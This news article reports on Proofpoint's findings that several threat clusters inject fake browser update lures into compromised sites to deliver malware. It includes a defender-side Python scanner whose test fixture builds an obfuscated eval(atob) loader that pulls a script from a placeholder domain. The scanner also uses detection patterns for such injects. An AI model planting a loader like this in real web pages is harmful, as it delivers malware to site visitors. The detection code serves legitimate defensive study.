Fake Browser Updates Used in Malware Distribution

Cybersecurity researchers from Proofpoint have identified a rising trend in threat activity that employs fake browser updates to disseminate malware. 

At least four distinct threat clusters have been tracked using this deceptive tactic. In a fake browser update lure, a compromised website displays a counterfeit notification mimicking a popular browser such as Chrome, Firefox or Edge, tricking users into downloading malicious software instead of a legitimate update.

Writing in an advisory published earlier today, Proofpoint said TA569, a threat actor, has been using fake browser updates for over five years to deliver SocGholish malware. Recently, other threat actors have adopted this strategy.

These threats infiltrate websites using JavaScript or HTML-injected code to direct traffic to their controlled domains and automatically download malicious payloads.


The success of fake browser update lures lies in exploiting users’ trust in known and safe sites, thereby bypassing security awareness training, Proofpoint security researcher Dusty Miller explained. 

Compromised URLs are found in various email traffic sources, including regular emails and monitoring alerts. The threats extend beyond email as users also encounter them on search engines, social media or direct site visits.

Each threat campaign employs unique methods to filter traffic, making detection challenging. These campaigns comprise three stages: injection on a compromised website; traffic to actor-controlled domains; and payload execution on the user’s device.

Proofpoint attributed SocGholish to TA569 and observed that the threat actor employed various methods to direct traffic from compromised websites to its actor-controlled domains.

RogueRaticate/FakeSG, a newer threat, injects obfuscated JavaScript code into stage 1 websites and uses Keitaro TDS for payload delivery. ZPHP/SmartApeSG leverages asynchronous requests, while ClearFake employs base64 encoded scripts and displays lures in different languages.
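As an added defender-side illustration (not code from Proofpoint's advisory or from this article): a small Python heuristic that inspects a fetched page's inline scripts for the patterns described above, namely decode-and-run primitives such as `eval`/`atob` and base64 blobs that decode to a script loader or an update lure. The sample pages and the `example.invalid` domain are constructed here and are not indicators from the campaigns.

```python
import base64
import re

# Inline <script> bodies and long base64-looking runs inside them.
SCRIPT_RE = re.compile(r"<script[^>]*>(.*?)</script>", re.S | re.I)
B64_RE = re.compile(r"[A-Za-z0-9+/]{64,}={0,2}")
# Phrases a decoded lure or its stage-2 script loader would typically contain.
LURE_MARKERS = ("update your browser", "browser update",
                "createelement('script')", 'createelement("script")')

def decode_b64(blob: str) -> str:
    """Best-effort decode; returns '' for anything that is not real base64."""
    try:
        padded = blob + "=" * (-len(blob) % 4)
        return base64.b64decode(padded).decode("utf-8", "ignore")
    except Exception:
        return ""

def scan_html(html: str) -> list:
    """Return (reason, snippet) findings for inline scripts that look injected."""
    findings = []
    for body in SCRIPT_RE.findall(html):
        # Heuristic 1: decode-and-run primitives typical of obfuscated injects.
        if re.search(r"\b(eval|atob|unescape)\s*\(", body) or "fromCharCode" in body:
            findings.append(("obfuscation-primitive", body.strip()[:60]))
        # Heuristic 2: base64 blobs that decode to a lure or a script loader.
        for blob in B64_RE.findall(body):
            decoded = decode_b64(blob).lower()
            if any(marker in decoded for marker in LURE_MARKERS):
                findings.append(("base64-lure", decoded[:60]))
    return findings

# Constructed samples: a clean page and one carrying a base64-wrapped loader
# that points at a placeholder domain (example.invalid is not a real indicator).
BENIGN_PAGE = "<html><script>console.log('hello');</script></html>"

def build_injected_page() -> str:
    loader = ("var s=document.createElement('script');"
              "s.src='https://updates.example.invalid/update-your-browser.js';"
              "document.head.appendChild(s);")
    blob = base64.b64encode(loader.encode()).decode()
    return f"<html><body><script>eval(atob('{blob}'));</script></body></html>"

if __name__ == "__main__":
    for reason, snippet in scan_html(build_injected_page()):
        print(reason, "->", snippet)
```

Such a scan is a triage aid for content pulled from a suspect site; it complements, rather than replaces, the network signatures and endpoint protection the advisory recommends.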

Miller warned that these fake browser update threats underscore the need for robust cybersecurity measures.

“Organizations should have network detections in place – including using the Emerging Threats ruleset – and use endpoint protection,” reads the advisory.

“Additionally, organizations should train users to identify the activity and report suspicious activity to their security teams. This is very specific training but can easily be integrated into an existing user training program.”
